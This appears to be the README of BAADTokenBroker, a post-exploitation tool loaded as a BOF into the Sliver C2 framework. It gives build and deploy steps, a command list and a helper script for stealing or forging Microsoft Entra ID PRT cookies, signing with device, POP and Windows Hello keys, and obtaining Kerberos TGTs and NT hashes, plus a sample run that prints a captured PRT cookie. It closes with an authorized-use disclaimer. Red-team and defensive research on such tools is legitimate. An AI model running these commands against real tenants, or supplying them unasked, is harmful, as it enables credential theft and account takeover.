BAADTokenBroker is a post-exploitation tool designed to interact with Microsoft Entra ID device-bound keys.

It can:

• Request the logged-on user’s PRT cookie
• Create a PRT cookie using supplied credentials
• Acquire a TGT and NT hash by abusing Entra Kerberos mechanisms

This tool was made possible thanks to the following open-source projects:

• ROADtools
• rooadtools_hybrid
• lsa-whisperer
• aadjoininfo

The following example demonstrates how to use BAADTokenBroker with Sliver. Adjust the steps as needed for other C2 frameworks.

1. Compile the code

sudo apt install gcc-mingw-w64-x86-64-win32 make 

2. Deploy the BOF

• Copy the compiled release/BAADTokenBroker.x64.o to ~/.sliver-client/extensions/BAADTokenBroker/
• Save the extension.json in the same directory
• Load the bof in Sliver

sliver > extensions load ~/.sliver-client/extensions/BAADTokenBroker/ 

BAADTokenBroker provides the following commands:

• info: Retrieve Entra ID information
• get_token_blob: Dump cached token (this is mainly research purpose and not easy to be used in engagements)
• sign_with_dkpriv: Sign provided data using Entra device key
• sign_with_popkey: Sign provided data using POP key
• decrypt_with_popkey: Decrypt provided data using POP key
• sign_with_userkey: Sign provided data using Windows Hello for Business key
• request_prt_cookie: Request a PRT Cookie
• request_sso_tgs: Request a service ticket for Desktop SSO, which you can use it with your favorite tools like SeamlessPass.

However, to use the commands easily for common scenarios, helper.py generates BAADTokenBroker's command lines based on what you want to achieve.

Run helper.py with one of the following options:

• request_prt_cookie

  • Generates command lines to request the logged-on user's PRT cookie

• create_prt_cookie

  • Generates command lines to create a PRT cookie using supplied credentials

• get_tgt

  • Generates command lines to request a partial TGT and session key via a PRT Cookie

• get_tgt_with_whfb

  • Generates command lines to request a partial TGT and session key via Windows Hello for Business

Here is the example when retrieving a user's PRT Cookie. When you want to generate command lines for sliver, -s option is required.

$ python3 helper.py -s request_prt_cookie [*] execute BAADTokenBroker as follows: BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA 

Execute the command lines like the following

[localhost] sliver (_) > BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA -arg2:<empty> (default) -arg3:<empty> (default) -arg4:<empty> (default) [*] Successfully executed BAADTokenBroker (coff-loader) [*] Got output: [*] requesting PRT Cookie... [+] request_prt_cookie success! eyJhbGciOiJIUzI1NiIsICJrZGZfd...(omitted) 

WARNING: This tool is intended exclusively for authorized security testing and research. Use of this software for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The developers assume no liability and are not responsible for any misuse or damage caused by this program.